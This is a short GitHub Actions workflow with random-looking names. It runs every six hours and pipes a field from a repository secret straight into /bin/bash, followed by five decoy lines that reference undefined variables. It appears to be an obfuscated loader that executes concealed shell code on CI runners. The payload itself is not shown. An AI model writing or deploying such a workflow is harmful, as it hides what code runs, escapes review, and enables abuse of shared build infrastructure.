name: yuanbanlao1839

on:
  workflow_dispatch:
  schedule:
    - cron: '1 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuanbanlao1839
        env:
          rb98: ${{ secrets.rb98 }}
        run: |
          echo $rb98 | jq -r .l8 | /bin/bash
          echo $wec8172 | jq -r .flt950 | /bin/bash
          echo $kuopp9182 | jq -r .lclij1 | /bin/bash
          echo $zmxom25430 | jq -r .nuy7 | /bin/bash
          echo $o52 | jq -r .tpmng9912 | /bin/bash
          echo $fxncx78582 | jq -r .kni3 | /bin/bash

